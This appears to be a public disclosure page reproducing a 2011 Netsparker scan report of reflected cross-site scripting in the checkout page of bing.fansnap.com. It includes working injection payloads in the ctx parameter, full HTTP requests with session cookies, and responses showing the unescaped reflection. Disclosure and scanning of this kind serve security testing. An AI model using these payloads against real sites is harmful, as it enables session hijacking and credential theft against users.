>XSS, Cross Site Scripting in bing.fansnap.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers



Loading

Netsparker - Scan Report Summary
TARGET URL
http://bing.fansnap.com/checkout/index/418563...
SCAN DATE
7/19/2011 1:36:07 PM
REPORT DATE
7/19/2011 2:55:42 PM
SCAN DURATION
00:03:07

Total Requests

Average Speed

req/sec.
15
identified
14
confirmed
0
critical
0
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
80 %
LOW
20 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/checkout/index/418563179 ctx GET Cross-site Scripting Yes
ctx GET Cross-site Scripting Yes
ch GET Cross-site Scripting Yes
ch GET Cross-site Scripting Yes
quantity GET Cross-site Scripting Yes
quantity GET Cross-site Scripting Yes
poctx GET Cross-site Scripting Yes
afm GET Cross-site Scripting Yes
poctx GET Cross-site Scripting Yes
uet GET Cross-site Scripting Yes
afm GET Cross-site Scripting Yes
uet GET Cross-site Scripting Yes
Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
TRACE / TRACK Identified Yes
Cross-site Scripting

Cross-site Scripting

12 TOTAL
IMPORTANT
CONFIRMED
12
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
ctx GET '"--></style></script><script>alert(0x000003)</script>
ch GET bing
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669
commit GET Change
zipcode GET 3

Request

GET /checkout/index/418563179?ctx='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode=3 HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342566973901825; tvid=1342566973901825; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAcE14kQY6C29mZnNldGn%2BkJ06EGJnX3Zpc2l0X2lkafxKryj1OhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2OTczOTAxODI1OhFiZ19zdHlsZV9pZHNJIgAGOwhG--0ae4f57108a04ea4721991511191a5939c5013dc; bg_lvd=1311100561
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 21
ETag: "993da9011a75aa89d8534941481a42a4"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAQHuZkQY6C29mZnNldGn%2BkJ06EGJnX3Zpc2l0X2lkafxKryj1OhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2OTczOTAxODI1OhFiZ19zdHlsZV9pZHNJIgAGOwhG--021805c07b3fb9dd6edcdd9bae8e2e7678ba5933; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000003)&lt;/script&gt;" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000003)&lt;/script&gt;" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000003)&lt;/script&gt;" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: -181883062, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape(''"--></style></script><script>netsparker(0x000003)</script>'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-181883062%3A1342566973901825%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100585%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
ctx GET '"--></style></script><script>alert(0x000016)</script>
ch GET bing
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669

Request

GET /checkout/index/418563179?ctx='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000016)%3C/script%3E&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342566973901825; tvid=1342567002106881; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAnClQkgY6C29mZnNldGn%2BkJ06EGJnX3Zpc2l0X2lkafxKryj1OhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2OTczOTAxODI1OhFiZ19zdHlsZV9pZHNJIgAGOwhG--616f5a2e2015eea68567a4a8b03924bb86d16ae7; bg_lvd=1311100561; ver=1; vid=1342567002106881; lvd=1311100596
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:36:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 35
ETag: "7849a0c614fe1442adc7d0f1b8f36e94"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huACDJYkgY6C29mZnNldGn%2BkJ06EGJnX3Zpc2l0X2lkafxKryj1OhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2OTczOTAxODI1OhFiZ19zdHlsZV9pZHNJIgAGOwhG--154f79f177c091c082c29fdf1f4dabe66bcae85f; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3617
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000016)&lt;/script&gt;" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000016)&lt;/script&gt;" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000016)&lt;/script&gt;" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a 